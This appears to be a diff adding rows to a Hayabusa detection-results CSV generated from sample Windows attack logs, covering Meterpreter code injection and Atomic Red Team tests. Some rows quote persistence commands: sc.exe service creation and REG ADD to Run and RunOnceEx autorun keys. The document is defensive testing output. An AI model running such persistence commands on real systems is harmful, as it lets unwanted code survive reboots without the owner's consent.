+2019-07-04 05:39:30.223 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.239 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.239 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.254 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe  :  Path: C:\Windows\System32\rundll32.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\notepad.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.254 +09:00,IEWIN7,1,high,Rundll32 Without Parameters,,rules/sigma/process_creation/win_rundll32_without_parameters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.254 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.254 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.254 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-19 05:40:00.730 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Trojan:PowerShell/Powersploit.M  :  Severity: Severe  :  Type: Trojan  :  User: MSEDGEWIN10\IEUser  :  Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1  :  Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:40:00.730 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:40:16.396 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Trojan:XML/Exeselrun.gen!A  :  Severity: Severe  :  Type: Trojan  :  User: MSEDGEWIN10\IEUser  :  Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl  :  Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:40:16.396 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: HackTool:JS/Jsprat  :  Severity: High  :  Type: Tool  :  User: MSEDGEWIN10\IEUser  :  Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005)  :  Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:41:17.508 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Backdoor:ASP/Ace.T  :  Severity: Severe  :  Type: Backdoor  :  User: MSEDGEWIN10\IEUser  :  Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx  :  Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:41:17.508 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:41:48.236 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Trojan:Win32/Sehyioa.A!cl  :  Severity: Severe  :  Type: Trojan  :  User: MSEDGEWIN10\IEUser  :  Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll  :  Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:41:48.236 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:51:50.275 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: HackTool:JS/Jsprat  :  Severity: High  :  Type: Tool  :  User: MSEDGEWIN10\IEUser  :  Path: containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068)  :  Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:53:31.900 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:53:31.902 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:53:31.905 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:53:31.905 +09:00,MSEDGEWIN10,1117,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:53:31.952 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 23:42:51.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 4516 288 0000023C0CA21C70  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:42:53.295 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:43:03.303 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell  :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:43:03.303 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:08.161 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:08.161 +09:00,-,-,low,Quick Execution of a Series of Suspicious Commands,[condition] count() by MachineName > 5 in timeframe [result] count:21 MachineName:null timeframe:5m,rules/sigma/process_creation/win_multiple_suspicious_cli.yml,-
+2019-07-19 23:44:08.185 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management  :  Command: sc.exe  create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe  :  Path: C:\Windows\System32\sc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:08.185 +09:00,MSEDGEWIN10,1,low,New Service Creation,,rules/sigma/process_creation/win_new_service_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:08.268 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe start AtomicTestService""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:08.288 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management  :  Command: sc.exe  start AtomicTestService  :  Path: C:\Windows\System32\sc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe start AtomicTestService""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:08.307 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe  :  Path: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:09.150 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe stop AtomicTestService""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:09.176 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management  :  Command: sc.exe  stop AtomicTestService  :  Path: C:\Windows\System32\sc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe stop AtomicTestService""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:09.176 +09:00,MSEDGEWIN10,1,low,Stop Windows Service,,rules/sigma/process_creation/win_service_stop.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:09.253 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe delete AtomicTestService""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:09.278 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management  :  Command: sc.exe  delete AtomicTestService  :  Path: C:\Windows\System32\sc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe delete AtomicTestService""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:09.351 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:32.101 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe  :  Path: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:53.219 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:53.219 +09:00,MSEDGEWIN10,1,medium,Reg Add RUN Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG  ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,medium,Direct Autorun Keys Modification,,rules/sigma/process_creation/win_susp_direct_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,medium,Reg Add RUN Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:53.292 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:53.292 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:53.330 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:53.349 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG  DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:53.371 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:53.371 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:44:53.402 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:06.075 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "" C:\Path\AtomicRedTeam.dll  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:06.075 +09:00,MSEDGEWIN10,1,medium,Reg Add RUN Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG  ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d  C:\Path\AtomicRedTeam.dll  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "" C:\Path\AtomicRedTeam.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,medium,Direct Autorun Keys Modification,,rules/sigma/process_creation/win_susp_direct_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,medium,Reg Add RUN Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:06.161 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:06.161 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:06.196 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:06.213 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG  DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:06.240 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:06.240 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:45:06.267 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
